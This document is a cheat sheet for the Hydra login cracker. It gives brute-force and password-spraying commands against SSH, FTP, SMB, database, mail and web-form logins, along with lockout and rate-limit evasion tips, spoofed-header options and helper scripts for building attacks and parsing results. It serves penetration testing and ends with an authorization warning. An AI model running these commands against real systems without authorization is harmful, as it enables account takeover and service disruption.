THC-Hydra is a parallelized network login cracker that supports many services and protocols. It tests the strength of authentication by submitting candidate credentials to a live service, either taken from wordlists (dictionary attack) or generated on the fly (brute force). Every guess is a network round trip, so throughput is bounded by the target and every attempt is visible to its logging, rate limiting and lockout policy.
# Hydra comes pre-installed on Kali Linux
hydra --help
sudo apt update
sudo apt install hydra
# Install dependencies
sudo apt install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev
# Compile from source
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
sudo make install
hydra [options] target service
# SSH brute force with single username
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
# FTP brute force with username list
hydra -L userlist.txt -P passlist.txt ftp://192.168.1.100
# HTTP POST form attack
hydra -l admin -P passlist.txt 192.168.1.100 http-post-form "/login:username=^USER^&password=^PASS^:Invalid login"
# Single username and password
hydra -l username -p password target service
# Single username, multiple passwords
hydra -l username -P passwordlist.txt target service
# Multiple usernames, single password
hydra -L userlist.txt -p password target service
# Multiple usernames and passwords
hydra -L userlist.txt -P passwordlist.txt target service
# Username:password combination file
hydra -C combo.txt target service
# Number of parallel connections (default: 16)
hydra -t 32 -L users.txt -P pass.txt target service
# Overall parallel connects across all targets when attacking a target list with -M (default: 64)
hydra -M targets.txt -T 4 -L users.txt -P pass.txt service
# Wait time between each attempt per task, in seconds (-W); -w is the response timeout instead (default: 32)
hydra -W 3 -L users.txt -P pass.txt target service
# Exit after first valid password found
hydra -f -L users.txt -P pass.txt target service
# Verbose output
hydra -v -l admin -P pass.txt target service
# Show every login/password attempt as it is made (-V); use -d for debug output
hydra -V -l admin -P pass.txt target service
# Save output to file
hydra -o results.txt -l admin -P pass.txt target service
# Resume interrupted session
hydra -R
# Basic auth brute force
hydra -L users.txt -P pass.txt target http-get /admin/
# With a specific user agent: the module's H= option adds a header; the colon in the header must be escaped as \:
hydra -L users.txt -P pass.txt target http-get "/admin/:H=User-Agent\: Mozilla/5.0"
# Login form attack
hydra -l admin -P pass.txt target http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid login"
# With additional parameters
hydra -l admin -P pass.txt target http-post-form "/login.php:username=^USER^&password=^PASS^&submit=Login:Invalid login"
# HTTPS form attack
hydra -l admin -P pass.txt target https-post-form "/login.php:username=^USER^&password=^PASS^:Invalid login"
# GET-based login
hydra -l admin -P pass.txt target http-get-form "/login.php:username=^USER^&password=^PASS^:Invalid login"
# With cookies (colons inside header values must be escaped as \:)
hydra -l admin -P pass.txt target http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid:H=Cookie\: PHPSESSID=abc123"
# With custom headers
hydra -l admin -P pass.txt target http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid:H=X-Forwarded-For\: 127.0.0.1"
# Success condition instead of a failure string: treat the post-login redirect (302) as success.
# Use S= when the failure page has no stable text; check one real login by hand so S= does not match failures too.
hydra -l admin -P pass.txt target http-post-form "/login.php:username=^USER^&password=^PASS^:S=302"
# Basic SSH attack
hydra -l root -P pass.txt ssh://192.168.1.100
# SSH with specific port
hydra -l root -P pass.txt ssh://192.168.1.100:2222
# SSH with a shorter response timeout (seconds; default is 32)
hydra -w 5 -l root -P pass.txt ssh://192.168.1.100
# FTP brute force
hydra -L users.txt -P pass.txt ftp://192.168.1.100
# Anonymous FTP check (-e n additionally tries an empty password)
hydra -l anonymous -p anonymous -e n ftp://192.168.1.100
# SMB brute force
hydra -L users.txt -P pass.txt smb://192.168.1.100
# Same SMB attack with the target and service given positionally
hydra -L users.txt -P pass.txt 192.168.1.100 smb
# MySQL brute force
hydra -L users.txt -P pass.txt mysql://192.168.1.100
# PostgreSQL attack
hydra -l postgres -P pass.txt postgres://192.168.1.100
# MSSQL attack
hydra -L users.txt -P pass.txt mssql://192.168.1.100
# SMTP brute force
hydra -L users.txt -P pass.txt smtp://mail.target.com
# POP3 attack
hydra -L users.txt -P pass.txt pop3://mail.target.com
# IMAP attack
hydra -L users.txt -P pass.txt imap://mail.target.com
Create a file with username:password combinations:
# combo.txt format
admin:admin
root:root
user:password123
test:test123
# Use combo file
hydra -C combo.txt target service
# Password generation (-x MIN:MAX:CHARSET replaces -p/-P): a = lowercase, A = uppercase, 1 = digits,
# any other character is added literally. Keyspaces grow fast; see the estimate below before using this over the network.
hydra -l admin -x 4:6:a target service     # 4-6 chars, lowercase
hydra -l admin -x 6:8:aA1 target service   # 6-8 chars, mixed case + digits
hydra -l admin -x 8:10:aA1! target service # 8-10 chars, mixed case, digits and the literal '!'
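The -x generator tries every string in the charset, so its cost is the sum of |charset|^n over the requested lengths. The helper below is an added example, not part of hydra: it parses the -x spec the way the page describes (a, A, 1, literal characters) and converts the keyspace into wall-clock hours at an assumed online guess rate, to show why anything beyond a few characters is not a network attack.

```shell
#!/bin/sh
# Keyspace estimator for hydra's -x MIN:MAX:CHARSET generator.
# Added helper, not part of hydra. Charset letters follow the -x syntax:
# 'a' = 26 lowercase, 'A' = 26 uppercase, '1' = 10 digits, anything else is one literal character.

hydra_x_charset_size() {
  cs=$1; n=0
  while [ -n "$cs" ]; do
    c=${cs%"${cs#?}"}   # first character of the remaining spec
    cs=${cs#?}
    case $c in
      a) n=$((n + 26)) ;;
      A) n=$((n + 26)) ;;
      1) n=$((n + 10)) ;;
      *) n=$((n + 1)) ;;
    esac
  done
  echo "$n"
}

hydra_x_keyspace() {
  # usage: hydra_x_keyspace MIN:MAX:CHARSET -> total number of candidates hydra would try
  min=${1%%:*}; rest=${1#*:}; max=${rest%%:*}; chars=${rest#*:}
  size=$(hydra_x_charset_size "$chars")
  total=0; len=$min
  while [ "$len" -le "$max" ]; do
    p=1; i=0
    while [ "$i" -lt "$len" ]; do p=$((p * size)); i=$((i + 1)); done
    total=$((total + p)); len=$((len + 1))
  done
  echo "$total"
}

hydra_x_hours() {
  # usage: hydra_x_hours SPEC GUESSES_PER_SECOND -> whole hours needed to exhaust the space
  echo $(( $(hydra_x_keyspace "$1") / $2 / 3600 ))
}

# 16 guesses/s is an assumed, optimistic sustained rate for one SSH target with the default 16 tasks
for spec in 4:6:a 6:8:aA1 '8:10:aA1!'; do
  printf '%-10s candidates=%-20s hours at 16/s=%s\n' \
    "$spec" "$(hydra_x_keyspace "$spec")" "$(hydra_x_hours "$spec" 16)"
done
```

Even the smallest spec on the page (4:6:a) is several months of continuous guessing at that rate; the mixed-case ones are measured in centuries. Offline cracking (john, hashcat) is where exhaustive generation belongs; online, -x is only useful for very short PINs or when combined with a known prefix.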
# HTTP CONNECT proxy (format: [connect|socks4|socks5]://[login:pass@]host:port)
export HYDRA_PROXY=connect://proxy:8080
hydra -l admin -P pass.txt target service
# SOCKS proxy
export HYDRA_PROXY=socks4://proxy:1080
hydra -l admin -P pass.txt target service
# Hydra saves its state to ./hydra.restore in the current directory when interrupted
# Resume the interrupted attack; all options, including -o, are taken from the restore file, not the command line
hydra -R
# Capture login request with Burp Suite first
# POST /login.php HTTP/1.1
# Content-Type: application/x-www-form-urlencoded
# username=admin&password=test&submit=Login
# Convert to Hydra command
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form "/login.php:username=^USER^&password=^PASS^&submit=Login:Invalid username or password"
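Most http-post-form failures come from building the module string by hand: a wrong field name, a stale captured value left in place, or an unescaped colon in the failure text or a cookie header, which hydra reads as a field separator. The helper below is an added example, not part of hydra, that turns the captured request above into the module string mechanically; the request fields it feeds in are constructed, and in practice you would copy them from the Burp or browser capture of one real login attempt.

```shell
#!/bin/sh
# Turn a captured login POST into a hydra http-post-form module string.
# Added helper, not part of hydra. The request fields at the bottom are constructed.

# hydra uses ':' as the field separator inside the module string, so any colon in the
# failure text or in an added header value must be written as '\:'
hydra_escape() {
  printf '%s' "$1" | sed 's/:/\\:/g'
}

# usage: hydra_form_spec PATH BODY FAILURE_STRING USER_FIELD PASS_FIELD [HEADER ...]
#   PATH           request path, e.g. /login.php
#   BODY           captured form body, e.g. username=admin&password=test&submit=Login
#   FAILURE_STRING text the page shows on a failed login (copied from the captured response)
#   USER_FIELD     form field carrying the user name -> replaced by ^USER^
#   PASS_FIELD     form field carrying the password  -> replaced by ^PASS^
#   HEADER         optional "Name: value" headers (session cookie, X-Forwarded-For, ...)
hydra_form_spec() {
  path=$1; body=$2; fail=$3; ufield=$4; pfield=$5; shift 5
  # Prefix '&' so every field starts with '&' and one substitution covers the first field too;
  # other fields (submit=Login, hidden inputs) are kept as captured
  params=$(printf '&%s' "$body" | sed -e "s|&${ufield}=[^&]*|\&${ufield}=^USER^|" \
                                      -e "s|&${pfield}=[^&]*|\&${pfield}=^PASS^|" \
                                      -e 's|^&||')
  spec="${path}:${params}:$(hydra_escape "$fail")"
  for hdr in "$@"; do
    spec="${spec}:H=$(hydra_escape "$hdr")"
  done
  printf '%s' "$spec"
}

# Constructed capture of one manual login attempt
spec=$(hydra_form_spec "/login.php" "username=admin&password=test&submit=Login" \
       "Invalid username or password" username password "Cookie: PHPSESSID=abc123")
printf 'hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form "%s"\n' "$spec"
```

Run the resulting command once with -V and a known-bad password and confirm hydra reports nothing; then once with a known-good one and confirm it reports exactly that pair. If both runs report success, the failure string is wrong (or the session cookie expired and every response is the login page).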
# Test common credentials
hydra -L common_users.txt -P common_pass.txt ssh://server.company.com
# Test against a specific user with a delay between attempts (10 s per task, 4 tasks)
hydra -l serviceaccount -P passwords.txt -W 10 -t 4 ssh://server.company.com
# WordPress admin brute force
hydra -l admin -P pass.txt target.com http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:ERROR"
# First, discover services with nmap
nmap -sV -p 21,22,23,25,53,80,110,443,993,995 target.com
# Then test discovered services
hydra -L users.txt -P pass.txt ftp://target.com
hydra -L users.txt -P pass.txt ssh://target.com
hydra -L users.txt -P pass.txt smtp://target.com
# Slow down attacks to stay under rate limits: one task, 5 seconds between attempts
hydra -W 5 -t 1 -L users.txt -P pass.txt target service
# Hydra has no random-delay option; -w only raises the response timeout for slow or throttled targets
hydra -w 60 -L users.txt -P pass.txt target service
# -s sets the target port (same as ssh://target:2222); hydra cannot choose the source IP
hydra -s 2222 -L users.txt -P pass.txt target ssh
# For HTTP attacks, set a realistic User-Agent through the module's H= option (escape the colon)
hydra -L users.txt -P pass.txt target http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid:H=User-Agent\: Mozilla/5.0 (X11; Linux x86_64)"
# Password lists
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/fasttrack.txt
/usr/share/wordlists/wfuzz/others/common_pass.txt
# Username lists (the second needs the seclists package)
/usr/share/wordlists/metasploit/unix_users.txt
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
# Common usernames
echo -e "admin\nroot\nuser\ntest\nguest\nadministrator" > users.txt
# Common passwords
echo -e "password\n123456\nadmin\nroot\ntest\nguest" > pass.txt
# Extract from website with CeWL
cewl -w wordlist.txt -d 2 -m 5 http://target.com
# Generate mutations
john --wordlist=base.txt --rules --stdout > mutated.txt
# Start with small, targeted lists
hydra -L top_users.txt -P top_pass.txt target service
# If successful, expand the attack
hydra -L expanded_users.txt -P /usr/share/wordlists/rockyou.txt target service
# Gather information first
nmap -sV target
nikto -h target
whatweb target
# Look for default credentials in application documentation
# Check for account lockout policies
# Identify authentication mechanisms
# Start small and targeted
hydra -l admin -p admin target service
# Common credentials
hydra -C common_creds.txt target service
# Dictionary attack
hydra -L users.txt -P small_pass.txt target service
# Full wordlist (last resort)
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt target service
# Test for lockout policies first: a few wrong passwords against one account you can afford to lock
# (hydra takes only one -p; use a small -P file for several passwords)
printf 'wrongpass1\nwrongpass2\nwrongpass3\n' > lockout_probe.txt
hydra -l testuser -P lockout_probe.txt -t 1 target service
# Then confirm out of band that testuser still accepts its real password
# If lockout detected, adjust strategy: one task, long pauses, one common password across many users
hydra -W 300 -t 1 -L users.txt -p commonpass target service # 5-minute delay between attempts
# Successful login found
[22][ssh] host: 192.168.1.100   login: admin   password: password123
# Connection errors
[ERROR] could not connect to target port 22
# Individual attempts (failures included) are only printed with -V
[ATTEMPT] target 192.168.1.100 - login "admin" - pass "wrong" - 1 of 14 [child 0] (0/0)
# Extract successful logins
grep -E "\[.*\]\[.*\].*login:" hydra_output.txt
# Count attempts (requires -V output) and count successes
grep -c "\[ATTEMPT\]" hydra_output.txt
grep -c "login:" hydra_output.txt
# Extract unique successful credentials
grep "login:" hydra_output.txt | awk '{print $5 ":" $7}' | sort -u
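The awk one-liner above breaks on passwords that contain spaces, because it cuts on whitespace rather than on hydra's "login:" and "password:" labels. The script below is an added example, not part of hydra: it parses a constructed log that mirrors the line formats shown above (found lines, -V attempt lines, an error line, and a duplicate found line) into deduplicated credentials and counters.

```shell
#!/bin/sh
# Parse saved hydra output (-o file; add -V for per-attempt lines) into credentials and counters.
# Added helper, not part of hydra. The log below is constructed to mirror hydra's line formats.

HYDRA_LOG=$(cat <<'EOF'
[DATA] max 4 tasks per 1 server, overall 4 tasks, 6 login tries (l:2/p:3), ~2 tries per task
[DATA] attacking ssh://192.168.1.100:22/
[ATTEMPT] target 192.168.1.100 - login "admin" - pass "123456" - 1 of 6 [child 0] (0/0)
[ATTEMPT] target 192.168.1.100 - login "admin" - pass "password123" - 2 of 6 [child 1] (0/0)
[22][ssh] host: 192.168.1.100   login: admin   password: password123
[ATTEMPT] target 192.168.1.100 - login "root" - pass "123456" - 3 of 6 [child 2] (0/0)
[ERROR] could not connect to target port 22
[21][ftp] host: 192.168.1.100   login: ftpuser   password: let me in
[22][ssh] host: 192.168.1.100   login: admin   password: password123
EOF
)

# Found credentials as "service host user:password", deduplicated. Fields are cut on the
# literal "host: ", "login: " and "password: " labels, so a password with spaces survives.
hydra_found() {
  printf '%s\n' "$1" | awk '/^\[[0-9]+\]\[[a-z0-9-]+\] host: / {
    svc = $0;  sub(/^\[[0-9]+\]\[/, "", svc);  sub(/\].*/, "", svc)
    host = $0; sub(/.*host: +/, "", host);     sub(/ +login:.*/, "", host)
    user = $0; sub(/.*login: +/, "", user);    sub(/ +password:.*/, "", user)
    pass = $0; sub(/.*password: +/, "", pass)
    print svc, host, user ":" pass
  }' | sort -u
}

# Attempts are only logged with -V; without it this stays 0 however long the run was
hydra_attempts() { printf '%s\n' "$1" | grep -c '^\[ATTEMPT\]' || true; }
hydra_errors()   { printf '%s\n' "$1" | grep -c '^\[ERROR\]' || true; }

hydra_found "$HYDRA_LOG"
echo "attempts: $(hydra_attempts "$HYDRA_LOG")  errors: $(hydra_errors "$HYDRA_LOG")"
```

The error counter is worth watching during a run: a rising [ERROR] count with no new found lines usually means the target started dropping connections (rate limiting or a lockout), and the remaining guesses are being wasted.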
# Test basic connectivity first
telnet target.com 22
nc -zv target.com 22
# Check for firewalls/rate limiting
nmap -sS -O target.com
# Capture request with Burp Suite or browser dev tools
# Verify form parameters and failure messages
# Check for CSRF tokens or captchas
# Reduce threads if connections fail
hydra -t 4 -L users.txt -P pass.txt target service
# Increase the response timeout (seconds) for slow or throttled targets
hydra -w 10 -L users.txt -P pass.txt target service
# Check system resources
top
netstat -an | grep target_ip
# Complete option reference
man hydra
# Web application form attack
hydra -l admin -P pass.txt target.com http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
# SSH brute force
hydra -L users.txt -P pass.txt ssh://target.com
# FTP brute force
hydra -L users.txt -P pass.txt ftp://target.com
# MySQL database attack
hydra -l root -P pass.txt mysql://target.com
# SMB/Windows shares
hydra -L users.txt -P pass.txt smb://target.com
# HTTP basic authentication
hydra -L users.txt -P pass.txt target.com http-get /admin/
# SMTP mail server
hydra -L users.txt -P pass.txt smtp://mail.target.com
# Resume interrupted session
hydra -R
# Generate passwords (6-8 chars, alphanumeric)
hydra -l admin -x 6:8:aA1 target.com ssh
Hydra is an extremely powerful tool that can cause account lockouts, service disruption, and legal consequences if misused. Always ensure you have proper authorization before testing any system, and use reasonable limits to avoid damaging target systems.
Master Hydra responsibly and help organizations improve their authentication security through ethical penetration testing.